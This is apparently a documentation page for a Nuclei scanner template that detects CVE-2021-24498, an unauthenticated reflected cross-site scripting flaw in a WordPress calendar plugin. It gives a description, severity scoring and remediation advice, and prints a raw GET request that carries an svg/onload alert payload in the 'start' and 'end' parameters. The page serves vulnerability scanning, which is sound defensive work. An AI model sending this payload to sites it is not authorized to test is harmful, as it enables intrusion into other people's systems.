WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting
ID: CVE-2021-24498
Severity: medium
Author: suman_kar
Tags: cve2021,cve,xss,wordpress,wp-plugin,wpscan,dwbooster
Description
Section titled “Description”WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the ‘start’ and ‘end’ GET parameters before outputting them in the page (via php/edit.php).
YAML Source
Section titled “YAML Source”id: CVE-2021-24498
info: name: WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting author: suman_kar severity: medium description: WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php). impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Calendar Event Multi View plugin to version 1.4.01 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 - https://nvd.nist.gov/vuln/detail/CVE-2021-24498 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24498 cwe-id: CWE-79 epss-score: 0.00171 epss-percentile: 0.54048 cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: dwbooster product: calendar_event_multi_view framework: wordpress tags: cve2021,cve,xss,wordpress,wp-plugin,wpscan,dwbooster
http: - raw: - | GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close
matchers-condition: and matchers: - type: word part: body words: - '><svg/onload=alert(1)><' - 'Calendar Details' condition: and
- type: word part: header words: - 'text/html'
- type: status status: - 200# digest: 490a004630440220188c688fc1a2d04721ed856f7b569f85f01c55ef577cc7746e16c5d333161e3f02202518f12c25a2585666853bb1fbaa8f31c4e93112a79b7a18851fcebee5f6ff43:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24498.yaml"